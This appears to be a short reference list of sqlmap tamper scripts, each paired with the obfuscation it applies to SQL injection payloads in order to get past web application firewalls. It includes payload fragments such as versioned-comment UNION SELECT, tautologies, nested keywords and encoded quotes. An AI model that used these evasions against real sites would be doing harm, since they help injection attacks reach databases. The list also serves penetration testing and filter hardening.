//%23 = #			%0A = \n
space2hash.py|space2morehash.py
_		function()	---->%23random%0A		function%23random%0A()
space2dash.py
_		---->		--[random]%0A

space2mssqlblank.py
_		---->		01-1F
space2mssqlhash.py
_		---->		%23%0A
space2mysqlblank.py
_		---->		09, 0A-0D, A0
space2mysqldash.py
_		---->		--%0A

unmagicquotes.py
'		---->		%bf%27

apostrophemask.py
'		---->		%EF%BC%87
apostrophenullencode.py
'		---->		%27

between.py
>		---->		NOT BETWEEN 0 AND #
bluecoat.py|equaltolike.py
_	=		---->	[blank]		LIKE
greatest.py
>		---->		GREATEST counterpart

halfversionedmorekeywords.py
/*!0UNION/*!0ALL/*!0SELECT
modsecurityversioned.py
1 /*!30874AND 2>1*/--
modsecurityzeroversioned.py
1 /*!00000AND 2>1*/-
versionedkeywords.py
/*!UNION*//*!ALL*//*!SELECT*/
versionedmorekeywords.py
/*!UNION*//*!ALL*//*!SELECT*/

ifnull2ifisnull.py
IFNULL(A, B)		---->		IF(ISNULL(A), B, A)

nonrecursivereplacement.py
UNIOUNIONN SELESELECTCT

percentage.py				//ASP/ASP.NET
%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M

securesphere.py
1 AND 1=1 and '0having'='0having

xforwardedfor.py
varnish.py
overlongutf8.py


randomcase.py
base64encode.py
space2comment.py
space2mysqldash.py
space2plus.py
space2randomblank.py
unionalltounion.py
charencode.py|chardoubleencode.py
charunicodeencode.py
lowercase.py

appendnullbyte.py
multiplespaces.py
randomcomments.py
sp_password.py				//Obfuscation from DBMS logs